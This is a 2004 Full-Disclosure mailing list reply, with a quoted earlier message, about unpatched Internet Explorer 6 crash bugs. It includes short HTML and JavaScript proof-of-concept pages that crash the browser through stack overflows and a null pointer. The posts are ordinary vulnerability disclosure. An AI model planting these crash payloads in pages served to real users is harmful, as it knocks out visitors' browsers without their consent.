Here's some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):
Stack overflows (_not_ buffer overflows):
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>
Null pointer:
<HTML style="width:expression(navigate('?#'))">
<HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>
None of them pose a security-risk and they all require JavaScript. So now I actually
forgot why I decided to mention them in a reply to this post. Well, maybe MS can fix
them in the next SP now that they know about them...
Cheers,
SkyLined
----- Original Message -----
From: "Martin" <[EMAIL PROTECTED]>
To: "Michal Zalewski" <[EMAIL PROTECTED]>
Cc: "Full Disclosure" <[EMAIL PROTECTED]>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-Disclosure] Web browsers - a mini-farce
> Am Mo, den 18.10.2004 schrieb Michal Zalewski um 16:18:
>
> > All browsers but Microsoft Internet Explorer kept crashing on a regular
> > basis
>
> Here, may I make your collection more complete?
>
> This one is for IE6 on MS-Windows 2000:
>
> <html><base href="ftp*://">
> <body>
> <iframe src="????"/>
> </body>
> </html>
>
> Martin
>
> PS: No, it's not been discovered by your tool. And I reported
> it already several years ago.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
